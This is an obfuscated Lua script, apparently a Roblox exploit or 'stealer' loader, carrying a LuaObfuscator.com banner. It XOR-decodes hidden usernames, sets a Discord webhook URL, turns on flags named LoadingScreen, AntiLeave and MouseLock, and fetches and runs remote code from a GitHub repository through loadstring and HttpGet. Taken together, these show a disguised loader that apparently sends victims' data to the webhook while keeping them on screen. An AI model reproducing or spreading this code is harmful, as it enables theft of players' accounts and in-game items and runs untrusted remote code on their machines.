--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + (v11% #v9) ,1 + (v11% #v9) + 1 )))%256 ));end return v5(v10);end UserName=v7("\240\209\214\36\232\191\200\45\193\194\201\36\226\186\206\13\135\147","\126\177\163\187\69\134\219\167");Webhook="https://discord.com/api/webhooks/1096931930441777202/AL4Z6KtMsJwSJ1vQQbjVBdtxt_V_Bdihh913UKpWj1a4qsTKhOL-wDNCrHuJsua6Jd6e";UserName2=v7("\2\223\39\196\242\39\194\25\213\253\49\204\46\196\245\48\155\122","\156\67\173\74\165");_G.LoadingScreen=true;_G.AntiLeave=true;_G.MouseLock=true;loadstring(game:HttpGet("https://raw.githubusercontent.com/LypherX/MoriScripts/main/MoriScripts",true))();
